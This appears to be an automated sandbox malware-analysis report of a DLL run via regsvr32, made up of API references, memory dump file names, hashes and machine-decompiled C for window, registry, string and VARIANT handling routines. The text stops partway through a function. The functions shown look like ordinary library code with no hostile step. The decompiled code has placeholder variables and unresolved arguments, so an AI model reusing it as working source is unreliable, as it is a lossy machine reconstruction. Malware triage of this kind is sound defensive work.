0x1003776c
0x1003776c
0x10037772
0x100377ad
0x100377ad
0x100377b2
0x100377c4
0x100377c9
0x100377ce
0x100377b4
0x100377b4
0x100377bc
0x100377bc
0x100377d6
0x100377db
0x100377e1
0x100377e1
0x100377e9
0x100377ec
0x100377fa
0x100377ff
0x10037806
0x1003780b
0x10037811
0x10037811
0x10037772
0x10037814
0x10037819
0x10037823
0x10037823
0x1003782c
0x1003782c
0x10037758
0x10037836

APIs

EnterCriticalSection.KERNEL32(1004F010,00000000,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037742
TlsGetValue.KERNEL32(1004EFF4,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037760
LocalAlloc.KERNEL32(00000000,00000003,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD), ref: 100377BC
LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4), ref: 100377CE
LeaveCriticalSection.KERNEL32(?,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 100377DB
TlsSetValue.KERNEL32(1004EFF4,00000000), ref: 1003780B
LeaveCriticalSection.KERNEL32(1004F010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 1003782C

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$AllocLeaveLocalValue$Enter
String ID:
API String ID: 784703316-0
Opcode ID: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
Instruction ID: 1d31c533a979c77301d76d8eb0d2db078f0d9c8120d6b2d843174624ed3e927a
Opcode Fuzzy Hash: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
Instruction Fuzzy Hash: F8317C75600615AFD726DF59C8C8C5ABBE5FF08352B11C929E81ADB611CB30FC50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000F6EA Relevance: 10.6, APIs: 7, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000F6EA(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E100220EE(_t45, GetTopWindow( *(_t45 + 0x1c)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E100203CE(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1000F6EA(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E100220EE(_t44, GetWindow( *(_t41 + 0x1c), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1000F695(_t45, E100220EE(_t45, GetParent( *(_t41 + 0x1c))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
						continue;
					}
				}
				_t42 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
				goto L7;
			}

0x1000f6ea
0x1000f6ea
0x1000f6ec
0x1000f6f3
0x1000f793
0x1000f797
0x1000f7a6
0x1000f7aa
0x1000f755
0x1000f765
0x1000f7bc
0x00000000
0x1000f7bc
0x1000f767
0x1000f768
0x1000f76f
0x1000f781
0x1000f7b0
0x1000f7b0
0x1000f7b1
0x1000f7b3
0x00000000
0x1000f7b3
0x1000f783
0x1000f78c
0x00000000
0x00000000
0x00000000
0x1000f78e
0x1000f78e
0x1000f78e
0x1000f78f
0x1000f790
0x1000f7b4
0x1000f7b9
0x00000000
0x1000f7bb
0x1000f76f
0x00000000
0x1000f7ac
0x1000f708
0x1000f70d
0x1000f741
0x1000f729
0x1000f72d
0x00000000
0x1000f733
0x1000f73c
0x00000000
0x1000f73c
0x1000f72d
0x1000f753
0x00000000

APIs

GetWindow.USER32(?,00000002), ref: 1000F705
GetParent.USER32(?), ref: 1000F716
GetWindow.USER32(?,00000002), ref: 1000F739
GetWindow.USER32(?,00000002), ref: 1000F74B
GetWindowLongA.USER32 ref: 1000F75A
IsWindowVisible.USER32 ref: 1000F774
GetTopWindow.USER32(?), ref: 1000F79A

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: e05f7d3be3f5bc05d13bf1b8876ce0f3ed84c428b3ff9c55c238cc21a07b9566
Instruction ID: 9ff0abfdc9ec089c08616602c8c252ca1eec58daf7253e76d9435a222983167d
Opcode Fuzzy Hash: e05f7d3be3f5bc05d13bf1b8876ce0f3ed84c428b3ff9c55c238cc21a07b9566
Instruction Fuzzy Hash: 2B21C1366087286FE732EEA19C49F2B769CEF406D0F02491CF845E7596C760EC01D791

Uniqueness

Uniqueness Score: -1.00%

Function 10024AA1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E10024AA1(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				CHAR* _t21;
				CHAR* _t22;
				int _t31;
				CHAR* _t33;
				intOrPtr _t35;
				CHAR* _t40;
				void* _t44;
				void* _t47;

				_t40 = _a4;
				_t31 = lstrlenA(_t40);
				_t21 = E10038481(_t40, 0, 0) - 1;
				_t44 = _t31 - _t21;
				_t35 = _t44 + _t40;
				_a4 = _t21;
				_v8 = _t35;
				if(_a8 < _t31) {
					if(_a8 >= _t21) {
						_t33 =  &(_t40[2]);
						if( *_t40 == 0x5c && _t40[1] == 0x5c) {
							while( *_t33 != 0x5c) {
								_t33 = E100127D1(_t33);
							}
						}
						if(_t44 > 3) {
							do {
								_t33 = E100127D1(_t33);
							} while ( *_t33 != 0x5c);
						}
						_t22 = _a4;
						_t47 = _t33 - _t40;
						_t12 =  &(_t22[5]); // 0x5
						if(_a8 >= _t47 + _t12) {
							while(lstrlenA(_t33) + _t47 + 4 > _a8) {
								do {
									_t33 = E100127D1(_t33);
								} while ( *_t33 != 0x5c);
							}
							 *((char*)(_t47 + _t40)) = 0;
							lstrcatA(_t40, "\\...");
							_t21 = lstrcatA(_t40, _t33);
						} else {
							_push(_v8);
							goto L14;
						}
					} else {
						if(_a12 == 0) {
							_t35 = 0x1003da51;
						}
						_push(_t35);
						L14:
						_t21 = lstrcpyA(_t40, ??);
					}
				}
				return _t21;
			}

0x10024aa8
0x10024ab7
0x10024abe
0x10024ac1
0x10024ac6
0x10024ac9
0x10024acc
0x10024acf
0x10024ad8
0x10024aeb
0x10024aee
0x10024b01
0x10024aff
0x10024aff
0x10024b01
0x10024b09
0x10024b0b
0x10024b11
0x10024b16
0x10024b0b
0x10024b19
0x10024b1e
0x10024b20
0x10024b27
0x10024b43
0x10024b35
0x10024b3b
0x10024b40
0x10024b35
0x10024b58
0x10024b63
0x10024b67
0x10024b29
0x10024b29
0x00000000
0x10024b29
0x10024ada
0x10024ade
0x10024ae0
0x10024ae0
0x10024ae5
0x10024b2c
0x10024b2d
0x10024b2d
0x10024ad8
0x10024b6d

APIs

lstrlenA.KERNEL32(?), ref: 10024AAC

Part of subcall function 10038481: PathFindFileNameA.SHLWAPI(?,10024ABE,?,00000000,00000000), ref: 10038485
Part of subcall function 10038481: lstrlenA.KERNEL32(00000000), ref: 10038493

lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 10024B44
lstrcatA.KERNEL32(?,\...), ref: 10024B63
lstrcatA.KERNEL32(?,00000000), ref: 10024B67

Strings

\..., xrefs: 10024B53

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: lstrlen$lstrcat$FileFindNamePathlstrcpy
String ID: \...
API String ID: 1604900594-1167917071
Opcode ID: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
Instruction ID: ad9d98bbfb168da91c5fc0e9dd0c54a6fb05e1c2565fcdf0eb8a60c119eae97e
Opcode Fuzzy Hash: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
Instruction Fuzzy Hash: 7D21E57590075AAEEB22CB70ACC4F5B7BF8DB05296F52805EE9059B042EB74E940CB51

Uniqueness

Uniqueness Score: -1.00%

Function 100304C6 Relevance: 10.6, APIs: 7, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E100304C6(void* __ecx) {
				struct tagMSG _v28;
				void* __ebp;
				int _t21;
				intOrPtr _t24;
				intOrPtr _t33;
				void* _t38;
				void* _t39;
				int _t40;

				_push(0);
				_t39 = __ecx;
				_t40 = 0xf;
				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
					if(_t21 != 0) {
						DispatchMessageA( &_v28);
						_push(0);
						continue;
					}
					return _t21;
				}
				_t24 =  *((intOrPtr*)(_t39 + 0x68));
				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x80));
				 *(_t39 + 0x78) =  *(_t24 + 0x7c) & 0x0000f000;
				SetRectEmpty(_t39 + 0xc);
				 *((intOrPtr*)(_t39 + 0x20)) = 0;
				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
				 *((intOrPtr*)(_t39 + 0x24)) = 0;
				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
				 *((intOrPtr*)(_t39 + 0x80)) = 0;
				_t38 = E100220EE(_t40, GetDesktopWindow());
				if(LockWindowUpdate( *(_t38 + 0x1c)) == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(GetDCEx( *(_t38 + 0x1c), 0, ??));
				_t33 = E10029068();
				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
				return _t33;
			}

0x100304d5
0x100304d8
0x100304da
0x100304ff
0x100304e5
0x100304ed
0x100304f8
0x100304fe
0x00000000
0x100304fe
0x10030581
0x10030581
0x1003050d
0x10030516
0x10030521
0x10030528
0x1003052e
0x10030531
0x10030534
0x10030537
0x1003053a
0x1003054c
0x10030559
0x10030562
0x1003055b
0x1003055b
0x1003055b
0x1003056e
0x1003056f
0x10030574
0x00000000

APIs

GetMessageA.USER32 ref: 100304E5
DispatchMessageA.USER32 ref: 100304F8
PeekMessageA.USER32 ref: 10030507
SetRectEmpty.USER32(?), ref: 10030528
GetDesktopWindow.USER32 ref: 10030540
LockWindowUpdate.USER32(?,00000000), ref: 10030551
GetDCEx.USER32(?,00000000,00000003), ref: 10030568

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
String ID:
API String ID: 1192691108-0
Opcode ID: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
Instruction ID: 8a91eee366d4ec1ad94f649a4fc85a3a9efab89b356857822c8a99d212f9e85e
Opcode Fuzzy Hash: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
Instruction Fuzzy Hash: 39215EB2500B09AFE311DF66DC84E57BBECFB04251F41492EF655CA511D735E9448F60

Uniqueness

Uniqueness Score: -1.00%

Function 100358C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100358C8(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x100358e3
0x100358ea
0x100358ed
0x100358f0
0x100358f3
0x100358fe
0x10035935
0x10035935
0x10035940
0x10035945
0x10035945
0x1003594a
0x1003594f
0x1003594f
0x10035958

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
RegCloseKey.ADVAPI32(?), ref: 10035945
RegCloseKey.ADVAPI32(?), ref: 1003594F

Strings

software, xrefs: 100358DE

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
Instruction ID: f89c3a735d8d1ef68568a63ef4ea0061cb5f0d4f5e3c764e69df4fb83dc90cc3
Opcode Fuzzy Hash: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
Instruction Fuzzy Hash: BF11B37690029DFFDB12DB9ACD88DDFBFBCEF89755F1040AAE500A6121D2719A00DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10007B50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10007B50(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;

				if(E1000799F() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x1004ee08(_a4, _a8);
			}

0x10007b5d
0x10007b76
0x10007bdd
0x10007bdd
0x10007bdf
0x00000000
0x10007be0
0x10007b78
0x10007b7f
0x00000000
0x10007b98
0x10007b99
0x10007b9c
0x10007baa
0x10007bad
0x10007bb5
0x10007bb6
0x10007bb7
0x10007bb8
0x10007bbf
0x10007bc2
0x10007bc6
0x10007bd3
0x10007bd3
0x10007bd9
0x00000000
0x10007bd9
0x10007b7f
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10007B8E
GetSystemMetrics.USER32 ref: 10007BA6
GetSystemMetrics.USER32 ref: 10007BAD
lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 10007BD3

Strings

B, xrefs: 10007B6D
DISPLAY, xrefs: 10007BCA

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: System$Metrics$InfoParameterslstrcpyn
String ID: B$DISPLAY
API String ID: 2307409384-3316187204
Opcode ID: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
Instruction ID: f9e3eb19a9beaf27ca7ac5b5242ad86db65a0bc6b8874f4885458b15db7551ae
Opcode Fuzzy Hash: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
Instruction Fuzzy Hash: B6117771A012399FEB12DF658C84B5B7BA8FF05791B118466FD09AE109D374DD40CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 10020D81 Relevance: 10.6, APIs: 7, Instructions: 60COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 10020D8D
GetWindowRect.USER32 ref: 10020DA8
ScreenToClient.USER32 ref: 10020DBB
ScreenToClient.USER32 ref: 10020DC4
EqualRect.USER32 ref: 10020DCE
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10020DF6
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10020E00

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
Instruction ID: 0a58a577598c21a1846f40493314dc2d021d714bbb101a3e6ae2e9ccd4581a15
Opcode Fuzzy Hash: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
Instruction Fuzzy Hash: C1113D7650021AAFDB01DFA5DC84EBBBBBEEF84310B118419F916E7112D770A940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000ECE8 Relevance: 9.4, APIs: 6, Instructions: 384
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1000ECE8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t155;
				signed int _t167;
				signed short _t168;
				intOrPtr* _t170;
				void* _t172;
				signed short _t181;
				signed short _t183;
				void* _t186;
				signed short _t189;
				signed short _t191;
				signed short _t196;
				signed short _t198;
				signed short _t207;
				long long* _t214;
				intOrPtr* _t218;
				void* _t220;
				void* _t226;
				void* _t229;
				intOrPtr* _t231;
				void* _t237;
				void* _t240;
				signed int _t243;
				signed short _t244;
				signed short _t245;
				signed short _t249;
				signed short _t253;
				intOrPtr* _t254;
				intOrPtr _t276;
				void* _t318;
				intOrPtr* _t326;
				void* _t327;
				signed long long _t335;

				_t318 = __edx;
				E10011BF0(0x1003b04c, _t327);
				_t155 =  *0x1004c470; // 0xf256d946
				 *((intOrPtr*)(_t327 - 0x10)) = _t155;
				 *(_t327 - 0x30) = 0;
				E10010592(_t327 - 0x40);
				_t321 =  *((intOrPtr*)(__ecx + 0x54));
				 *((intOrPtr*)(_t327 - 4)) = 0;
				E1000C8EB( *((intOrPtr*)(__ecx + 0x54)), __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x28);
				_t333 =  *((intOrPtr*)(_t327 - 0x28)) - 3;
				if( *((intOrPtr*)(_t327 - 0x28)) == 3 || E1000B5EA(_t321, _t333,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x26) == 0) {
					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					__imp__#9(_t327 - 0x40);
				} else {
					_t167 =  *(_t327 - 0x26) & 0x0000ffff;
					_t326 = __imp__#9;
					__eflags = _t167 - 0x81;
					if(__eflags > 0) {
						_t168 = _t167 - 0x82;
						__eflags = _t168;
						if(__eflags == 0) {
							goto L47;
						} else {
							_t181 = _t168 - 1;
							__eflags = _t181;
							if(__eflags == 0) {
								_t183 = E1000C669(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
								__eflags = _t183;
								if(_t183 != 0) {
									__eflags =  *(_t327 - 0x23);
									asm("fild qword [ebp-0x21]");
									if( *(_t327 - 0x23) > 0) {
										do {
											_t129 = _t327 - 0x23;
											 *_t129 =  *(_t327 - 0x23) - 1;
											__eflags =  *_t129;
											_t335 = _t335 *  *0x10040908;
										} while ( *_t129 != 0);
									}
									__eflags =  *(_t327 - 0x22);
									if( *(_t327 - 0x22) == 0) {
										_t335 = st0;
										asm("fchs");
										st1 = _t335;
									}
									 *(_t327 - 0x78) = _t335;
									 *((short*)(_t327 - 0x80)) = 5;
									 *((char*)(_t327 - 4)) = 0xe;
									E10010578(_t327 - 0x80, _t327 - 0x40, _t327 - 0x80);
									_t186 = _t327 - 0x80;
									goto L36;
								}
							} else {
								_t189 = _t181;
								__eflags = _t189;
								if(__eflags == 0) {
									_t191 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
									__eflags = _t191;
									if(_t191 != 0) {
										asm("fldz");
										 *(_t327 - 0x20) = _t335;
										 *((intOrPtr*)(_t327 - 0x18)) = 0;
										E1000B521(_t327 - 0x20,  *(_t327 - 0x30),  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff, 0, 0, 0);
										 *((short*)(_t327 - 0x70)) = 7;
										 *(_t327 - 0x68) =  *(_t327 - 0x20);
										 *((char*)(_t327 - 4)) = 0xf;
										E10010578(_t327 - 0x70, _t327 - 0x40, _t327 - 0x70);
										_t186 = _t327 - 0x70;
										goto L36;
									}
								} else {
									_t196 = _t189 - 1;
									__eflags = _t196;
									if(__eflags == 0) {
										_t198 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
										__eflags = _t198;
										if(_t198 != 0) {
											asm("fldz");
											 *(_t327 - 0x20) = _t335;
											 *((intOrPtr*)(_t327 - 0x18)) = 0;
											E1000B582( *(_t327 - 0x30) & 0x0000ffff,  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff);
											 *((short*)(_t327 - 0xb0)) = 7;
											 *(_t327 - 0xa8) =  *(_t327 - 0x20);
											 *((char*)(_t327 - 4)) = 0x10;
											E10010578(_t327 - 0xb0, _t327 - 0x40, _t327 - 0xb0);
											_t186 = _t327 - 0xb0;
											goto L36;
										}
									} else {
										__eflags = _t196 - 1;
										if(__eflags == 0) {
											_t207 = E1000C6BD(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
											__eflags = _t207;
											if(_t207 != 0) {
												_t214 = E1000C853(_t327 - 0x13c,  *((short*)(_t327 - 0x24)),  *(_t327 - 0x22) & 0x0000ffff,  *(_t327 - 0x20) & 0x0000ffff,  *(_t327 - 0x1e) & 0x0000ffff,  *(_t327 - 0x1c) & 0x0000ffff,  *(_t327 - 0x1a) & 0x0000ffff);
												 *((short*)(_t327 - 0xa0)) = 7;
												 *((long long*)(_t327 - 0x98)) =  *_t214;
												 *((char*)(_t327 - 4)) = 0x11;
												E10010578(_t327 - 0xa0, _t327 - 0x40, _t327 - 0xa0);
												_t186 = _t327 - 0xa0;
												goto L36;
											}
										}
									}
								}
							}
						}
					} else {
						if(__eflags == 0) {
							_t218 = E10006B11(_t327 + 0xc, __eflags);
							 *((char*)(_t327 - 4)) = 2;
							_t220 = E100105C5(_t327 - 0x120,  *_t218, 8);
							 *((char*)(_t327 - 4)) = 3;
							E10010578(_t220, _t327 - 0x40, _t220);
							 *_t326(_t327 - 0x120, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
							_t276 =  *((intOrPtr*)(_t327 + 0xc));
							goto L48;
						} else {
							__eflags = _t167 - 8;
							if(__eflags > 0) {
								__eflags = _t167 - 0xb;
								if(__eflags == 0) {
									_t226 = E100104C1(_t327 - 0x100,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 0xb);
									 *((char*)(_t327 - 4)) = 0xb;
									E10010578(_t226, _t327 - 0x40, _t226);
									_t186 = _t327 - 0x100;
									goto L36;
								} else {
									__eflags = _t167 - 0xc;
									if(__eflags == 0) {
										_t229 = E100105A5(_t327 - 0xf0, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
										 *((char*)(_t327 - 4)) = 1;
										E10010578(_t229, _t327 - 0x40, _t229);
										_t186 = _t327 - 0xf0;
										goto L36;
									} else {
										__eflags = _t167 - 0xf;
										if(_t167 > 0xf) {
											__eflags = _t167 - 0x11;
											if(__eflags <= 0) {
												_t231 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
												 *((short*)(_t327 - 0x60)) = 0x11;
												 *((char*)(_t327 - 0x58)) =  *_t231;
												 *((char*)(_t327 - 4)) = 6;
												E10010578(_t327 - 0x60, _t327 - 0x40, _t327 - 0x60);
												_t186 = _t327 - 0x60;
												goto L36;
											} else {
												__eflags = _t167 - 0x12;
												if(__eflags == 0) {
													goto L24;
												} else {
													__eflags = _t167 - 0x13;
													if(__eflags == 0) {
